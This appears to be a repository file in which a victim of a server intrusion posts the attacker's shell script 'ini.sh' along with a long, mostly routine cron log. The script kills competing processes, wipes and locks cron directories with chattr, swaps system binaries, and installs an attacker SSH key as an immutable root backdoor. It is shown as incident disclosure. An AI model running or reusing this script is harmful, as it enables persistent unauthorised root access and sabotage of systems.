-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathdev-site-invasion-log
More file actions
1664 lines (1656 loc) · 198 KB
/
dev-site-invasion-log
File metadata and controls
1664 lines (1656 loc) · 198 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
# Our development site was hacked
Maybe want to get more source code.
## This hack crom code,file name: ini.sh;
```log
#!/bin/sh
ps aux | grep -v grep | grep 'sysupdat' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'networkservi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'sysgu' | awk '{print $2}' | xargs -I % kill -9 %
for f in /bin/*;do strings $f|grep -q chattr_dir_proc&&break;done;$f -i $f
for f in /bin/*;do strings $f|grep -q chattr_dir_proc&&break;done;$f -i /bin/*
for f in /bin/*;do strings $f|grep -q chattr_dir_proc&&break;done;mv $f /bin/chattr
chattr -R -i /var/spool/cron
rm -rf /var/spool/cron/*
chattr -R +i /var/spool/cron
chattr -R -i /etc/cron.d
rm -rf /etc/cron.d/*
chattr -R +i /etc/cron.d
chattr -R -i /etc/crontab
rm -rf /etc/crontab/*
chattr -R +i /etc/crontab/
chattr -i /etc/*
rm -rf sysupdat* networkservi* sysgu* config.json updat* sysupdat*
for f in /bin/*;do strings $f|grep -q "Each MODE is of the form"&&break;done;mv $f /bin/chmod
mkdir /root/.ssh
chattr -R -i /root/.ssh
chmod 700 /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHsyS5MLm0tfvN0THaddK8J5DDoMJcdCegaqJTazyM3qPmITlW597Jm+BYESOQ2QkRSACYe82NlU0m1W3B0k3uTnNcCrARlgsGncz/aJT/iCREC/6CZ2oCGV942axH6HFrDm1cStxEJ/I/aLuFCsJN81HSHkMAp+BenHyHea9aKG2+uDVqN4uESVO4kYZUeyLoPTFzf4sx6EwYqOLGqyLURltc58OCX55PGoS92VQj/BGzhbht8+k6b0NrAlOApZEAuvmyIW7DAjkEm/rbx2ZWyg1NZXl0q//98jg+/+1a1vexe2qH/B49Ggs0FJuFe7lJTxQoXm4Mxh+2Vboibhw1 root@localhost.localdomain" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chattr -R +i /root/.ssh/authorized_keys
```
## This cron log;
```log
Mar 29 03:22:01 host-name run-parts(/etc/cron.daily)[15884]: finished logrotate
Mar 29 03:22:01 host-name run-parts(/etc/cron.daily)[15861]: starting man-db.cron
Mar 29 03:22:02 host-name run-parts(/etc/cron.daily)[15895]: finished man-db.cron
Mar 29 03:22:02 host-name anacron[14417]: Job `cron.daily' terminated (produced output)
Mar 29 03:22:02 host-name anacron[14417]: Can't find sendmail at /usr/sbin/sendmail, not mailing output
Mar 29 03:22:02 host-name anacron[14417]: Normal exit (1 job run)
Mar 29 03:56:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 29 03:56:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 29 03:56:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 29 03:56:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 29 04:01:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 29 04:01:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 29 04:01:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 29 04:01:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 29 04:01:01 host-name CROND[18730]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 04:01:01 host-name run-parts(/etc/cron.hourly)[18730]: starting 0anacron
Mar 29 04:01:01 host-name run-parts(/etc/cron.hourly)[18739]: finished 0anacron
Mar 29 05:01:01 host-name CROND[22699]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 05:01:01 host-name run-parts(/etc/cron.hourly)[22699]: starting 0anacron
Mar 29 05:01:01 host-name run-parts(/etc/cron.hourly)[22708]: finished 0anacron
Mar 29 06:01:01 host-name CROND[26148]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 06:01:01 host-name run-parts(/etc/cron.hourly)[26148]: starting 0anacron
Mar 29 06:01:01 host-name run-parts(/etc/cron.hourly)[26157]: finished 0anacron
Mar 29 07:01:01 host-name CROND[29545]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 07:01:01 host-name run-parts(/etc/cron.hourly)[29545]: starting 0anacron
Mar 29 07:01:01 host-name run-parts(/etc/cron.hourly)[29554]: finished 0anacron
Mar 29 08:01:01 host-name CROND[584]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 08:01:01 host-name run-parts(/etc/cron.hourly)[584]: starting 0anacron
Mar 29 08:01:01 host-name run-parts(/etc/cron.hourly)[594]: finished 0anacron
Mar 29 09:01:01 host-name CROND[4181]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 09:01:01 host-name run-parts(/etc/cron.hourly)[4181]: starting 0anacron
Mar 29 09:01:01 host-name run-parts(/etc/cron.hourly)[4190]: finished 0anacron
Mar 29 09:31:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 29 09:31:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 29 09:31:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 29 10:01:01 host-name CROND[7902]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 10:01:01 host-name run-parts(/etc/cron.hourly)[7902]: starting 0anacron
Mar 29 10:01:01 host-name run-parts(/etc/cron.hourly)[7911]: finished 0anacron
Mar 29 10:31:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 29 10:31:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 29 10:31:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 29 11:01:01 host-name CROND[11469]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 11:01:01 host-name run-parts(/etc/cron.hourly)[11469]: starting 0anacron
Mar 29 11:01:01 host-name run-parts(/etc/cron.hourly)[11478]: finished 0anacron
Mar 29 12:01:01 host-name CROND[15057]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 12:01:01 host-name run-parts(/etc/cron.hourly)[15057]: starting 0anacron
Mar 29 12:01:01 host-name run-parts(/etc/cron.hourly)[15066]: finished 0anacron
Mar 29 13:01:01 host-name CROND[18419]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 13:01:01 host-name run-parts(/etc/cron.hourly)[18419]: starting 0anacron
Mar 29 13:01:01 host-name run-parts(/etc/cron.hourly)[18428]: finished 0anacron
Mar 29 14:01:01 host-name CROND[21671]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 14:01:01 host-name run-parts(/etc/cron.hourly)[21671]: starting 0anacron
Mar 29 14:01:01 host-name run-parts(/etc/cron.hourly)[21680]: finished 0anacron
Mar 29 15:01:01 host-name CROND[24893]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 15:01:01 host-name run-parts(/etc/cron.hourly)[24893]: starting 0anacron
Mar 29 15:01:01 host-name run-parts(/etc/cron.hourly)[24902]: finished 0anacron
Mar 29 16:01:01 host-name CROND[28002]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 16:01:01 host-name run-parts(/etc/cron.hourly)[28002]: starting 0anacron
Mar 29 16:01:01 host-name run-parts(/etc/cron.hourly)[28011]: finished 0anacron
Mar 29 16:40:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 29 16:40:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 29 16:40:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 29 17:01:01 host-name CROND[31643]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 17:01:01 host-name run-parts(/etc/cron.hourly)[31643]: starting 0anacron
Mar 29 17:01:01 host-name run-parts(/etc/cron.hourly)[31652]: finished 0anacron
Mar 29 18:01:01 host-name CROND[2998]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 18:01:01 host-name run-parts(/etc/cron.hourly)[2998]: starting 0anacron
Mar 29 18:01:01 host-name run-parts(/etc/cron.hourly)[3007]: finished 0anacron
Mar 29 19:01:01 host-name CROND[6683]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 19:01:01 host-name run-parts(/etc/cron.hourly)[6683]: starting 0anacron
Mar 29 19:01:01 host-name run-parts(/etc/cron.hourly)[6692]: finished 0anacron
Mar 29 20:01:01 host-name CROND[10450]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 20:01:01 host-name run-parts(/etc/cron.hourly)[10450]: starting 0anacron
Mar 29 20:01:01 host-name run-parts(/etc/cron.hourly)[10459]: finished 0anacron
Mar 29 21:01:01 host-name CROND[14066]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 21:01:01 host-name run-parts(/etc/cron.hourly)[14066]: starting 0anacron
Mar 29 21:01:01 host-name run-parts(/etc/cron.hourly)[14075]: finished 0anacron
Mar 29 22:01:01 host-name CROND[17614]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 22:01:01 host-name run-parts(/etc/cron.hourly)[17614]: starting 0anacron
Mar 29 22:01:01 host-name run-parts(/etc/cron.hourly)[17623]: finished 0anacron
Mar 29 23:01:01 host-name CROND[21115]: (root) CMD (run-parts /etc/cron.hourly)
Mar 29 23:01:01 host-name run-parts(/etc/cron.hourly)[21115]: starting 0anacron
Mar 29 23:01:01 host-name run-parts(/etc/cron.hourly)[21124]: finished 0anacron
Mar 30 00:01:01 host-name CROND[25197]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 00:01:01 host-name run-parts(/etc/cron.hourly)[25197]: starting 0anacron
Mar 30 00:01:01 host-name anacron[25206]: Anacron started on 2020-03-30
Mar 30 00:01:01 host-name anacron[25206]: Normal exit (0 jobs run)
Mar 30 00:01:01 host-name run-parts(/etc/cron.hourly)[25208]: finished 0anacron
Mar 30 01:01:01 host-name CROND[29090]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 01:01:01 host-name run-parts(/etc/cron.hourly)[29090]: starting 0anacron
Mar 30 01:01:01 host-name anacron[29099]: Anacron started on 2020-03-30
Mar 30 01:01:01 host-name anacron[29099]: Normal exit (0 jobs run)
Mar 30 01:01:01 host-name run-parts(/etc/cron.hourly)[29101]: finished 0anacron
Mar 30 02:01:01 host-name CROND[691]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 02:01:01 host-name run-parts(/etc/cron.hourly)[691]: starting 0anacron
Mar 30 02:01:02 host-name anacron[700]: Anacron started on 2020-03-30
Mar 30 02:01:02 host-name anacron[700]: Normal exit (0 jobs run)
Mar 30 02:01:02 host-name run-parts(/etc/cron.hourly)[702]: finished 0anacron
Mar 30 03:01:01 host-name CROND[4710]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 03:01:01 host-name run-parts(/etc/cron.hourly)[4710]: starting 0anacron
Mar 30 03:01:01 host-name anacron[4719]: Anacron started on 2020-03-30
Mar 30 03:01:01 host-name anacron[4719]: Will run job `cron.daily' in 7 min.
Mar 30 03:01:01 host-name anacron[4719]: Jobs will be executed sequentially
Mar 30 03:01:01 host-name run-parts(/etc/cron.hourly)[4721]: finished 0anacron
Mar 30 03:08:01 host-name anacron[4719]: Job `cron.daily' started
Mar 30 03:08:01 host-name run-parts(/etc/cron.daily)[5200]: starting logrotate
Mar 30 03:08:01 host-name run-parts(/etc/cron.daily)[5214]: finished logrotate
Mar 30 03:08:01 host-name run-parts(/etc/cron.daily)[5200]: starting man-db.cron
Mar 30 03:08:01 host-name run-parts(/etc/cron.daily)[5225]: finished man-db.cron
Mar 30 03:08:01 host-name anacron[4719]: Job `cron.daily' terminated (produced output)
Mar 30 03:08:01 host-name anacron[4719]: Can't find sendmail at /usr/sbin/sendmail, not mailing output
Mar 30 03:08:01 host-name anacron[4719]: Normal exit (1 job run)
Mar 30 04:01:01 host-name CROND[8790]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 04:01:01 host-name run-parts(/etc/cron.hourly)[8790]: starting 0anacron
Mar 30 04:01:01 host-name run-parts(/etc/cron.hourly)[8799]: finished 0anacron
Mar 30 05:01:01 host-name CROND[12469]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 05:01:01 host-name run-parts(/etc/cron.hourly)[12469]: starting 0anacron
Mar 30 05:01:01 host-name run-parts(/etc/cron.hourly)[12478]: finished 0anacron
Mar 30 06:01:01 host-name CROND[15957]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 06:01:01 host-name run-parts(/etc/cron.hourly)[15957]: starting 0anacron
Mar 30 06:01:01 host-name run-parts(/etc/cron.hourly)[15967]: finished 0anacron
Mar 30 06:51:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 30 06:51:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 06:51:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 07:01:01 host-name CROND[19417]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 07:01:01 host-name run-parts(/etc/cron.hourly)[19417]: starting 0anacron
Mar 30 07:01:01 host-name run-parts(/etc/cron.hourly)[19426]: finished 0anacron
Mar 30 08:01:01 host-name CROND[23249]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 08:01:01 host-name run-parts(/etc/cron.hourly)[23249]: starting 0anacron
Mar 30 08:01:01 host-name run-parts(/etc/cron.hourly)[23258]: finished 0anacron
Mar 30 09:01:01 host-name CROND[27176]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 09:01:01 host-name run-parts(/etc/cron.hourly)[27176]: starting 0anacron
Mar 30 09:01:01 host-name run-parts(/etc/cron.hourly)[27185]: finished 0anacron
Mar 30 09:42:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 30 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 09:42:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 10:01:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 30 10:01:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 10:01:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 10:01:01 host-name CROND[30788]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 10:01:01 host-name run-parts(/etc/cron.hourly)[30788]: starting 0anacron
Mar 30 10:01:01 host-name run-parts(/etc/cron.hourly)[30797]: finished 0anacron
Mar 30 11:01:01 host-name CROND[1784]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 11:01:01 host-name run-parts(/etc/cron.hourly)[1784]: starting 0anacron
Mar 30 11:01:01 host-name run-parts(/etc/cron.hourly)[1793]: finished 0anacron
Mar 30 12:01:01 host-name CROND[5309]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 12:01:01 host-name run-parts(/etc/cron.hourly)[5309]: starting 0anacron
Mar 30 12:01:01 host-name run-parts(/etc/cron.hourly)[5318]: finished 0anacron
Mar 30 13:01:01 host-name CROND[8844]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 13:01:01 host-name run-parts(/etc/cron.hourly)[8844]: starting 0anacron
Mar 30 13:01:01 host-name run-parts(/etc/cron.hourly)[8853]: finished 0anacron
Mar 30 13:38:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 30 13:38:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 13:38:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 13:38:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 13:43:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 30 13:43:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 13:43:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 13:43:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 13:43:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 13:58:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 30 13:58:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 13:58:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 13:58:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 13:58:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 14:01:01 host-name CROND[12470]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 14:01:01 host-name run-parts(/etc/cron.hourly)[12470]: starting 0anacron
Mar 30 14:01:01 host-name run-parts(/etc/cron.hourly)[12479]: finished 0anacron
Mar 30 14:03:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 30 14:03:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 14:03:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 14:18:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 30 14:18:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 14:18:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 15:01:01 host-name CROND[15863]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 15:01:01 host-name run-parts(/etc/cron.hourly)[15863]: starting 0anacron
Mar 30 15:01:01 host-name run-parts(/etc/cron.hourly)[15872]: finished 0anacron
Mar 30 15:35:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 30 15:35:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 15:35:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 16:01:01 host-name CROND[19217]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 16:01:01 host-name run-parts(/etc/cron.hourly)[19217]: starting 0anacron
Mar 30 16:01:01 host-name run-parts(/etc/cron.hourly)[19226]: finished 0anacron
Mar 30 17:01:01 host-name CROND[22938]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 17:01:01 host-name run-parts(/etc/cron.hourly)[22938]: starting 0anacron
Mar 30 17:01:01 host-name run-parts(/etc/cron.hourly)[22947]: finished 0anacron
Mar 30 18:01:01 host-name CROND[26880]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 18:01:01 host-name run-parts(/etc/cron.hourly)[26880]: starting 0anacron
Mar 30 18:01:01 host-name run-parts(/etc/cron.hourly)[26889]: finished 0anacron
Mar 30 19:01:01 host-name CROND[30812]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 19:01:01 host-name run-parts(/etc/cron.hourly)[30812]: starting 0anacron
Mar 30 19:01:01 host-name run-parts(/etc/cron.hourly)[30821]: finished 0anacron
Mar 30 19:28:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 30 19:28:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 19:28:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 19:43:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 30 19:43:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 19:43:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 30 20:01:01 host-name CROND[2091]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 20:01:01 host-name run-parts(/etc/cron.hourly)[2091]: starting 0anacron
Mar 30 20:01:02 host-name run-parts(/etc/cron.hourly)[2100]: finished 0anacron
Mar 30 21:01:01 host-name CROND[5658]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 21:01:01 host-name run-parts(/etc/cron.hourly)[5658]: starting 0anacron
Mar 30 21:01:01 host-name run-parts(/etc/cron.hourly)[5667]: finished 0anacron
Mar 30 22:01:01 host-name CROND[9182]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 22:01:01 host-name run-parts(/etc/cron.hourly)[9182]: starting 0anacron
Mar 30 22:01:01 host-name run-parts(/etc/cron.hourly)[9191]: finished 0anacron
Mar 30 23:01:01 host-name CROND[12653]: (root) CMD (run-parts /etc/cron.hourly)
Mar 30 23:01:01 host-name run-parts(/etc/cron.hourly)[12653]: starting 0anacron
Mar 30 23:01:01 host-name run-parts(/etc/cron.hourly)[12662]: finished 0anacron
Mar 31 00:01:01 host-name CROND[16173]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 00:01:01 host-name run-parts(/etc/cron.hourly)[16173]: starting 0anacron
Mar 31 00:01:01 host-name anacron[16182]: Anacron started on 2020-03-31
Mar 31 00:01:01 host-name anacron[16182]: Normal exit (0 jobs run)
Mar 31 00:01:01 host-name run-parts(/etc/cron.hourly)[16184]: finished 0anacron
Mar 31 00:05:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 00:05:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 00:05:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 01:01:01 host-name CROND[19768]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 01:01:01 host-name run-parts(/etc/cron.hourly)[19768]: starting 0anacron
Mar 31 01:01:01 host-name anacron[19777]: Anacron started on 2020-03-31
Mar 31 01:01:01 host-name anacron[19777]: Normal exit (0 jobs run)
Mar 31 01:01:01 host-name run-parts(/etc/cron.hourly)[19779]: finished 0anacron
Mar 31 02:01:01 host-name CROND[23609]: (root) CMD (run-parts /etc/cron.hourly)
Mar 31 02:01:01 host-name run-parts(/etc/cron.hourly)[23609]: starting 0anacron
Mar 31 02:01:01 host-name anacron[23618]: Anacron started on 2020-03-31
Mar 31 02:01:01 host-name anacron[23618]: Normal exit (0 jobs run)
Mar 31 02:01:01 host-name run-parts(/etc/cron.hourly)[23620]: finished 0anacron
Mar 31 02:09:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 02:09:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:09:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:14:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 02:14:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:14:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:14:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:14:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:14:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:14:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:14:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:14:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:14:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:14:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:14:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:14:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:14:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:34:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 02:34:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:34:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:34:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:34:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:34:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:34:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:34:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:34:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:34:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:34:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:34:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:34:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:34:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (root) RELOAD (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
Mar 31 02:39:01 host-name crond[1006]: (CRON) bad minute (/var/spool/cron/root)
